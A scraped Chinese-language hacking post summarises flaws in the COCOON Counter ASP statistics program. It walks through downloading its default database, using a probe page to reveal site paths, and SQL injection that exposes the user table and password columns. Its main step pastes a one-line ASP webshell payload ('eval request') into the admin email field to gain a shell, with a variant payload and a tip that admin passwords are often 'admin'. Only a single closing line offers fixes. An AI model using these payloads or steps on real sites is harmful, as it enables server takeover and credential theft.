文本内容:
COCOON Counter统计程序漏洞总结漏洞预警电脑资料
一、默认数据库counter/_db/db_CC_Counter
6.mdb也可直接打开.badguest./Counter/utilities/update.asp查看源文件,查找程序的问题
二、暴路径漏洞利用探针.xxx./Counter/utilities/aspSysCheck.asp,查看网站路径
三、注入存在用户注入,猜解出用户的帐号和密码,无法拿SHELL只可社工利用.badguest./xxcount/core/default.aspid=xxc流量统计用户名是xxc,保存密码的表名是t_Site,用户名列是UID,密码列是PWD,页面(.badguest./xxcount/supervise/login.asp)
四、后台插马需要进后台,可插一句拿SHELL,具体进后台在管理信箱那把hacker@
263.:eval requestchr35//复制过去,,点击保存,看下_inc/mon.asp的内容WebMasterEmail=hacker@
263.\:eval requestchr35//嘿嘿来执行下,嘿嘿!成功了,统计程序中的后台拿将转义成了\所以这用了evalrequestchr35嘿嘿,//是注释,:在asp中就是换行,前提就是你能进到后台,(好多后台管理密码都是admin嘿嘿)php也可以这样的嘿嘿,而且比asp利用的地方更多!需要动下配置语句的前后搭配好,利用好一些符号另注黑防也有人提到了类似方法,可以写成9xiao%%eval requestchr35%%,这个方法也比较巧妙,//和在asp都是注释语句!by逍遥复仇提供修方案注意修改默认路径和默认密码加强过滤和验证模板,内容仅供参考 。